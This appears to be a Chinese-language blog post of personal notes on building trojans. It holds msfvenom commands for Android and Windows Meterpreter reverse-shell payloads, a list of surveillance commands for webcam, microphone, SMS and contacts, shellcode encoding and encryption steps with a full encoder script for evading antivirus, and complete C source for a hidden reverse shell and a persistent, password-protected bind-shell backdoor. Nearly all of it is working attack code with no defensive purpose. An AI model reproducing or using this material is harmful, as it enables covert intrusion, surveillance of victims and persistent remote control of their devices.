Trojan

msfvenom

msfconsole

use exploit/multi/handler
set payload ****/meterpreter/reverse_tcp 
show options 
set LHOST=192.168.0.106
set LHOST 192.168.0.106
set LPORT 5555

android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 R > ./shell.apk

help:

Stdapi: Webcam Commands
===================================
    webcam_list  列出网络摄像头
    record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒
    webcam_chat  开始视频聊天
    webcam_snap  从指定的摄像头获取快照
    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]
Android Commands
=================
	activity_start  从URI字符串启动Android活动
	check_root  检查设备是否有根
	dump_calllog  获取调用日志
	dump_contacts  获取联系人列表
	dump_sms  获取短信
	geolocate  利用地理定位获取当前LAT
	wlan_geolocate  利用WLAN信息获取当前LAT
	hide_app_icon  从发射器隐藏应用程序图标
	interval_collect  管理区间收集能力
	send_sms  从目标会话发送短消息
	set_audio_mode
	sqlite_query  从存储库查询SQLite数据库
	wakelock  启用/禁用Wakelock

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f exe -o shell.exe

1

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw
wget https://github.com/clinicallyinane/shellcode_launcher/blob/master/shellcode_launcher.exe
shellcode_launcher.exe -i shellcode.raw

2

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw
git clone https://github.com/Arno0x/ShellcodeWrapper
cd ShellcodeWrapper
python shellcode_encoder.py -cpp -cs -py shellcode.raw sir_123 xor

shellcode_encoder.py python3

#!/usr/bin/python3
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Modify: cc-sir
#

import argparse
from Crypto.Hash import MD5
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
from os import urandom
from string import Template
import os

templates = {
	'cpp': './templates/encryptedShellcodeWrapper.cpp',
	'csharp': './templates/encryptedShellcodeWrapper.cs',
	'python': './templates/encryptedShellcodeWrapper.py'
}

resultFiles = {
	'cpp': './result/encryptedShellcodeWrapper.cpp',
	'csharp': './result/encryptedShellcodeWrapper.cs',
	'python': './result/encryptedShellcodeWrapper.py'
}

# data as a bytearray
# key as a string
def xor(data, key):
	l = len(key)
	keyAsInt = list(map(ord, key))
	return bytes(bytearray((
	    (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
	)))

#------------------------------------------------------------------------
def pad(s):
	"""PKCS7 padding"""
	return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)

#------------------------------------------------------------------------
def aesEncrypt(clearText, key):

	# Generate a crypto secure random Initialization Vector
	iv = urandom(AES.block_size)

	# Perform PKCS7 padding so that clearText is a multiple of the block size
	clearText = pad(clearText)

	cipher = AES.new(key, AES.MODE_CBC, iv)
	return iv + cipher.encrypt(bytes(clearText))

def convertFromTemplate(parameters, templateFile):
	try:
		with open(templateFile) as f:
			src = Template(f.read())
			result = src.substitute(parameters)
			f.close()
			return result
	except IOError:
		print (color("[!] Could not open or read template file [{}]".format(templateFile)))
		return None

def formatCPP(data, key, cipherType):
	shellcode = "\\x"
	shellcode += "\\x".join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['cpp'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['cpp'])[0] + "_" + cipherType + os.path.splitext(resultFiles['cpp'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] C++ code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write C++ code  [{}]".format(fileName)))

# data as a bytearray
def formatCSharp(data, key, cipherType):
	shellcode = '0x'
	shellcode += ',0x'.join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['csharp'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['csharp'])[0] + "_" + cipherType + os.path.splitext(resultFiles['csharp'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] C# code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write C# code  [{}]".format(fileName)))

#------------------------------------------------------------------------
# data as a bytearray
def formatPy(data, key, cipherType):
	shellcode = '\\x'
	shellcode += '\\x'.join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['python'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['python'])[0] + "_" + cipherType + os.path.splitext(resultFiles['python'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] Python code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write Python code  [{}]".format(fileName)))

# data as a bytearray
def formatB64(data):
	return b64encode(data)

def color(string, color=None):
    """
    Author: HarmJ0y, borrowed from Empire
    Change text color for the Linux terminal.
    """
    
    attr = []
    # bold
    attr.append('1')
    
    if color:
        if color.lower() == "red":
            attr.append('31')
        elif color.lower() == "green":
            attr.append('32')
        elif color.lower() == "blue":
            attr.append('34')
        return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)

    else:
        if string.strip().startswith("[!]"):
            attr.append('31')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[+]"):
            attr.append('32')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[?]"):
            attr.append('33')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[*]"):
            attr.append('34')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        else:
            return string

if __name__ == '__main__':
	#------------------------------------------------------------------------
	# Parse arguments
	parser = argparse.ArgumentParser()
	parser.add_argument("shellcodeFile", help="File name containing the raw shellcode to be encoded/encrypted")
	parser.add_argument("key", help="Key used to transform (XOR or AES encryption) the shellcode")
	parser.add_argument("encryptionType", help="Encryption algorithm to apply to the shellcode", choices=['xor','aes'])
	parser.add_argument("-b64", "--base64", help="Display transformed shellcode as base64 encoded string", action="store_true")
	parser.add_argument("-cpp", "--cplusplus", help="Generates C++ file code", action="store_true")
	parser.add_argument("-cs", "--csharp", help="Generates C# file code", action="store_true")
	parser.add_argument("-py", "--python", help="Generates Python file code", action="store_true")
	args = parser.parse_args() 

	# Check that required directories and path are available, if not create them
	if not os.path.isdir("./result"):
		os.makedirs("./result")
		print (color("[+] Creating [./result] directory for resulting code files"))

	# Open shellcode file and read all bytes from it
	try:
		with open(args.shellcodeFile,"rb") as shellcodeFileHandle:
			shellcodeBytes = bytearray(shellcodeFileHandle.read())
			shellcodeFileHandle.close()
			print (color("[*] Shellcode file [{}] successfully loaded".format(args.shellcodeFile)))
	except IOError:
		print (color("[!] Could not open or read file [{}]".format(args.shellcodeFile)))
		quit()

	print (color("[*] MD5 hash of the initial shellcode: [{}]".format(MD5.new(shellcodeBytes).hexdigest())))
	print (color("[*] Shellcode size: [{}] bytes".format(len(shellcodeBytes))))

	# Perform AES128 transformation
	if args.encryptionType == 'aes':
		# Derive a 16 bytes (128 bits) master key from the provided key
		key = pyscrypt.hash(args.key, "saltmegood", 1024, 1, 1, 16)
		masterKey = formatB64(key)
		print (color("[*] AES encrypting the shellcode with 128 bits derived key [{}]".format(masterKey)))
		transformedShellcode = aesEncrypt(shellcodeBytes, key)
		cipherType = 'aes'

	# Perform XOR transformation
	elif args.encryptionType == 'xor':
		masterKey = args.key
		print (color("[*] XOR encoding the shellcode with key [{}]".format(masterKey)))
		transformedShellcode = xor(shellcodeBytes, masterKey)
		cipherType = 'xor'

	# Display interim results
	print ("\n==================================== RESULT ====================================\n")
	print (color("[*] Encrypted shellcode size: [{}] bytes".format(len(transformedShellcode))))

	# Display formated output
	if args.base64:
		print (color("[*] Transformed shellcode as a base64 encoded string"))		
		print (formatB64(transformedShellcode))
		print ("")
	
	if args.cplusplus:
		print (color("[*] Generating C++ code file"))
		formatCPP(transformedShellcode, masterKey, cipherType)
		print ("")
		

	if args.csharp:
		print (color("[*] Generating C# code file"))
		formatCSharp(transformedShellcode, masterKey, cipherType)
		print ("")

	if args.python:
		print (color("[*] Generating Python code file"))
		formatPy(transformedShellcode, masterKey, cipherType)
		print ("")

3

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f c -o msf.txt

code:

cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
wget https://github.com/DimopoulosElias/SimpleShellcodeInjector/raw/master/SimpleShellcodeInjector.c
i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
ssi.exe code

Trojan_第1张图片

反向链接

//#include "stdafx.h"
#include 
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

int _tmain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR LpszCmdLine,int nCmdShow)
{
	WSADATA wd;
	SOCKET sock;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	struct sockaddr_in sin;
	char IP[16]="172.16.217.1\x00"; //ip
	unsigned short port=1234; // port
	memset(&si,0,sizeof(si));
	WSAStartup(MAKEWORD(1,1),&wd);
	sock = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(port);
	sin.sin_addr.s_addr = inet_addr(IP);

	connect(sock,(struct sockaddr*)&sin,sizeof(sin));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
	CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi);
	return 0;
}

主动链接

//#include "stdafx.h"
#include 
#include 
#include 
#pragma comment(lib,"ws2_32.lib")
#define MasterPort 999
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") 
//windows控制台程序不出黑窗口
int add_reg(){ //添加自启动
	char regname[] = "SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run";
	//"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	HKEY hkResult;
	int ret;
	ret = RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
	//ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regname, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hkResult);
	ret = RegSetValueEx(hkResult,"MiniMuma",0,REG_EXPAND_SZ,(unsigned char *)"C:\\Windows\\MiniMuma.exe",25);
	
	char modlepath[256];
	char syspath[256];
	GetModuleFileName(0,modlepath,256); //获得程序名字
	ret = CopyFile(modlepath,strcat(syspath,"C:\\Windows\\MiniMuma.exe"),1);
	return 0;
}


int _tmain(int argc, _TCHAR* argv[])
{
    WSADATA WSADa;
    sockaddr_in SockAddrIn;
    SOCKET CSocket,SSocket;
    int iAddrSize;
    PROCESS_INFORMATION ProcessInfo;
	STARTUPINFO StartupInfo;
	char szCMDPath[255];
	char Pass[256];
	add_reg();
	while(1){
		ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
		ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
		ZeroMemory(&WSADa,sizeof(WSADATA));
		ZeroMemory(&Pass,sizeof(Pass));

		GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
		WSAStartup(0x0202,&WSADa);
	
		SockAddrIn.sin_family = AF_INET;
		SockAddrIn.sin_addr.s_addr = INADDR_ANY;
		SockAddrIn.sin_port = htons(MasterPort);
		CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

		bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));

		listen(CSocket,1);
		iAddrSize = sizeof(SockAddrIn);
		SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
		StartupInfo.cb = sizeof(STARTUPINFO);
		StartupInfo.wShowWindow = SW_HIDE;
		StartupInfo.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
		StartupInfo.hStdError = (HANDLE)SSocket;
		StartupInfo.hStdInput = (HANDLE)SSocket;
		StartupInfo.hStdOutput = (HANDLE)SSocket;
		int ret,ret2;
		recv(SSocket,Pass,256,0);
		ret = strcmp(Pass,"cc_sir\n");	//Passwd
		ret2 = strcmp(Pass,"quite\n");	//quite
		
		if(ret == 0){
			CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
			WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
			CloseHandle(ProcessInfo.hProcess);
			CloseHandle(ProcessInfo.hThread);

			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
		else if(ret2 == 0){
			send(SSocket,"MiniMuma quite!\n",sizeof("MiniMuma quite!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
			break;
		}
		else{
			send(SSocket,"Passwd is Error!\n",sizeof("Passwd is Error!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
	}
	return 0;
}

你可能感兴趣的:(Other)